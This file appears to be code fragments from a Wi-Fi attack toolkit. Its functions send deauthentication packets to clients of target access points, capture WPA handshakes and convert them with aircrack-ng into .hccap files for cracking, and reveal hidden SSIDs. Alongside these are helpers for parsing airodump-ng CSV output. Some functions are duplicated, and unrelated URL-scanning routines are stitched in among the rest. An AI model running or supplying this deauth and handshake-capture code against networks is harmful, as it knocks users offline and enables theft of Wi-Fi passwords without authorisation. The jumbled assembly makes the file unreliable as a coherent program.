def getHandshakes(target_bssid,target_ssids,ListenInterface,AttackInterface,verbose=True): handshakes = [] tested = [] cleanAPs = clean_AP_data(APs) for bssid,essid,channel,privacy,authentication,AP_date in cleanAPs: if target_bssid and (not target_bssid.lower() in bssid.lower()): continue if (essid and '\\x00' not in essid and essid not in handshakes) and ((target_ssids and essid.lower() in target_ssids) or (not target_ssids)): cleanStations = clean_station_data(stations) for station_mac,connected_bssid,station_date in cleanStations: if (bssid == connected_bssid and channel != '-1') and (essid not in handshakes) and ((bssid,station_mac) not in tested): outFileName = "%s_%s_%s" % (''.join([c for c in essid.lower() if c in ascii_lowercase or c in digits]),bssid,channel) (ACK,(ListenInterface,AttackInterface)) = deauth(bssid,channel,station_mac,MAX_CLIENT_DEAUTH,outFileName,ListenInterface,AttackInterface,verbose) outFileNames,outCAPFile = find_output_files(outFileName,'.cap') handshakeFile = 'W00T-'+outCAPFile.replace('.cap','') extractHandshake = "aircrack-ng %s -J %s" % (outCAPFile,handshakeFile) stdout, stderr = run_process(extractHandshake,MAX_PROC_WAIT) if (ACK >= MIN_ACKs) and not ("Successfully written to %s" % handshakeFile+'.hccap' in stdout): if verbose: print_warning("Too many deauthentication packets sent to \"%s\", the station's wireless card is having issues reconnecting... Try running this script against \"%s / %s\" later..." % (station_mac,essid,bssid)) elif "Successfully written to %s" % handshakeFile+'.hccap' in stdout: newOutCAPFile = "W00T-"+outCAPFile os.rename(outCAPFile,newOutCAPFile) if verbose: print_success("Handshake captured for the \"%s\" SSID! Output written to \"%s\" and \"%s\"" % (essid,newOutCAPFile,handshakeFile+'.hccap')) handshakes.append(essid) for outFile in outFileNames: try: os.remove(outFile) except: pass tested.append((bssid,station_mac)) else: pass if not tested: if verbose: print_error("No clients are connected to target SSID(s) and/or BSSID...") return handshakes
def urllist(config): """ Builds arguments to handle_url as tuples for starmap() This is a generator, wrapping another generator... (config,url) """ if config['source'] == 'hosts': for host in hostlist(config['hosts']): for proto in 'http','https': for port in config[proto]: url = "%s://%s:%s/" % (proto,host,port) yield (config,url) elif config['source'] == 'urls': for url in config['hosts']: yield (config,url) elif config['source'] == 'url-file': for urlfile in config['hosts']: if urlfile == '-': fp = sys.stdin else: try: fp = open(urlfile) except (IOError): print_error("Unable to open %s as url list file." % urlfile) continue for line in fp: yield(config,line.strip())
def urllist(config): """ Builds arguments to handle_url as tuples for starmap() This is a generator, wrapping another generator... (config,url) """ if config['source'] == 'hosts': for host in hostlist(config['hosts']): for proto in 'http', 'https': for port in config[proto]: url = "%s://%s:%s/" % (proto, host, port) yield (config, url) elif config['source'] == 'urls': for url in config['hosts']: yield (config, url) elif config['source'] == 'url-file': for urlfile in config['hosts']: if urlfile == '-': fp = sys.stdin else: try: fp = open(urlfile) except (IOError): print_error("Unable to open %s as url list file." % urlfile) continue for line in fp: yield (config, line.strip())
def openfp(self,fname): """Open the output file for writing""" if not fname or fname == '-': self.fp = sys.stdout else: try: self.fp = open(fname,"w") except (IOError): print_error("Unable to open file for output:" % fname) raise
def split_CSVs(inputFiles=[], APFileName=AP_FILE_NAME, stationFileName=STATION_FILE_NAME): APs = [] stations = [] try: if not inputFiles: csvFiles = [ file for file in os.listdir('.') if file.endswith('.csv') and not 'kismet' in file and file != AP_FILE_NAME and file != STATION_FILE_NAME ] else: csvFiles = inputFiles if not csvFiles: raise Exception("No CSV files found in the CWD...") for csvFile in csvFiles: csvFileObject = open(csvFile) csvContent = csvFileObject.read() csvContent = csvContent.split('\r\n\r\n') for line in csvContent[0].split('\n'): if len( line ) > 1 and not "BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication" in line: APs.append(line) for line in csvContent[1].split('\n'): if len( line ) > 1 and not "Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs" in line: stations.append(line) csvFileObject.close() APs = "BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key\n" + '\n'.join( APs) stations = "Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs\n" + '\n'.join( stations) open(APFileName, 'w').write(APs) open(stationFileName, 'w').write(stations) except: print_error( "You must run this from a directory containing Airodump-ng CSV output files and ensure you don't have any other CSV files in the CWD... Exiting..." ) sys.exit(1) return APFileName, stationFileName
def deauthAttack(target_bssid, target_ssids, target_station, ListenInterface, AttackInterface, verbose=True): tested = [] cleanAPs = clean_AP_data(APs) for bssid, essid, channel, privacy, authentication, AP_date in cleanAPs: if target_bssid and (not target_bssid.lower() in bssid.lower()): continue if (essid and '\\x00' not in essid) and ( (target_ssids and essid.lower() in target_ssids) or (not target_ssids)): cleanStations = clean_station_data(stations) for station_mac, connected_bssid, station_date in cleanStations: if not target_station: target_station = '' if (bssid == connected_bssid and channel != '-1') and ( (bssid, station_mac) not in tested) and ( (target_station and target_station.lower() in station_mac.lower()) or (not target_station)): outFileName = "%s_%s" % (bssid, channel) (ACK, (ListenInterface, AttackInterface)) = deauth( bssid, channel, station_mac, MAX_CLIENT_DEAUTH, outFileName, ListenInterface, AttackInterface, verbose) outFileNames, notRequired = find_output_files( outFileName, '') for outFile in outFileNames: try: os.remove(outFile) except: pass tested.append((bssid, station_mac)) else: pass if not tested: if verbose: print_error( "No clients are connected to target SSID(s) and/or BSSID...") return tested
def go(config): """Main function to handle execution""" # Dynamically load the configured rules ruleset = [] for r in config['rules'].iterkeys(): try: rule = rules.loadRule(r) ruleset.append((rule(config), config['rules'][r])) except (ImportError, AttributeError): print_error("ERROR: Unable to import rule %s!" % r) pass config['ruleset'] = ruleset # Get outputs outputs = output.getOutputs(config['output']) # Build the eventlet pool and fire off processing pool = eventlet.GreenPool(config['conns']) res = pool.starmap(net.handle_url, urllist(config)) # Sort results and print data res = sorted(filter(None, res), key=lambda val: val[1], reverse=True) for o in outputs: o.writeall(res)
def go(config): """Main function to handle execution""" # Dynamically load the configured rules ruleset = [] for r in config['rules'].iterkeys(): try: rule = rules.loadRule(r) ruleset.append((rule(config),config['rules'][r])) except (ImportError,AttributeError): print_error("ERROR: Unable to import rule %s!" % r) pass config['ruleset'] = ruleset # Get outputs outputs = output.getOutputs(config['output']) # Build the eventlet pool and fire off processing pool = eventlet.GreenPool(config['conns']) res = pool.starmap(net.handle_url,urllist(config)) # Sort results and print data res = sorted(filter(None,res),key=lambda val: val[1],reverse=True) for o in outputs: o.writeall(res)
def findHiddenNetworks(target_bssid, target_ssids, ListenInterface, AttackInterface, verbose=True): discovered = [] tested = [] cleanAPs = clean_AP_data(APs) for bssid, essid, channel, privacy, authentication, AP_date in cleanAPs: if target_bssid and (not target_bssid.lower() in bssid.lower()): continue if '\\x00' in essid or not essid: cleanStations = clean_station_data(stations) for station_mac, connected_bssid, station_date in cleanStations: if (bssid == connected_bssid and channel != '-1') and ( not (bssid, station_mac) in tested) and ( not bssid in [d[0] for d in discovered]): invalidTargetUnmasked = False numOfDiscovered = len(discovered) outFileName = "HIDDEN_%s_%s" % (bssid, channel) (ACK, (ListenInterface, AttackInterface)) = deauth( bssid, channel, station_mac, MAX_CLIENT_DEAUTH, outFileName, ListenInterface, AttackInterface, verbose) outFileNames, outCSVFile = find_output_files( outFileName, '.csv') APFileName = 'APs_' + outFileName + '.csv' stationFileName = 'stations_' + outFileName + '.csv' split_CSVs(inputFiles=[outCSVFile], APFileName=APFileName, stationFileName=stationFileName) discoveredAPs = parse_APs(APFileName) cleanDiscoveredAPs = clean_AP_data(discoveredAPs) for dis_bssid, dis_essid, dis_channel, dis_privacy, dis_authentication, dis_AP_date in cleanDiscoveredAPs: if (dis_essid and not '\\x00' in dis_essid) and ( not target_ssids or dis_essid.lower() in target_ssids): newOutCSVFile = outCSVFile.replace( "HIDDEN_", "W00T-UNHIDDEN_%s_" % '+'.join(dis_essid.split())) os.rename(outCSVFile, newOutCSVFile) if verbose: print_success( "\"%s\" discovered! Output written to \"%s\"" % (dis_essid, newOutCSVFile)) discovered.append((bssid, dis_essid)) if (dis_essid and not '\\x00' in dis_essid) and ( target_ssids and not dis_essid.lower() in target_ssids): invalidTargetUnmasked = True print_warning( "\"%s\" was discovered, but output was not stored..." % dis_essid) if (ACK >= MIN_ACKs) and ( len(discovered) == numOfDiscovered) and not invalidTargetUnmasked: if verbose: print_warning( "Too many deauthentication packets sent to \"%s\", the station's wireless card is having issues reconnecting... Try running this script against \"%s\" later..." % (station_mac, bssid)) for outputFile in outFileNames: try: os.remove(outputFile) except: pass os.remove(APFileName) os.remove(stationFileName) tested.append((bssid, station_mac)) else: pass if not tested: if verbose: print_error( "No clients are connected to target SSID(s) and/or BSSID...") return discovered
#!/usr/bin/python """ RedSpectrum - parse_airodump.py April 1, 2017 Leopold von Niebelschuetz-Godlewski Looks in the CWD for Airodump-ng .csv output files, and prints two tables containing wireless reconnaissance details. """ import argparse, csv, os, sys from core import print_error, print_warning, print_success try: from prettytable import PrettyTable except: print_error("You must install PrettyTable module first... Exiting...") sys.exit(1) AP_FILE_NAME = "APs.csv" STATION_FILE_NAME = "stations.csv" def parse_APs(fileName=AP_FILE_NAME): APs = [] with open(fileName) as csvFile: reader = csv.DictReader(csvFile) for row in reader: if row['BSSID'] != "00:00:00:00:00:00": APs.append((row['BSSID'].strip(), row[' ESSID'].strip(), row[' channel'].strip(), row[' Privacy'].strip(), row[' Authentication'].strip(), row[' Last time seen'].strip().split()[0])) return APs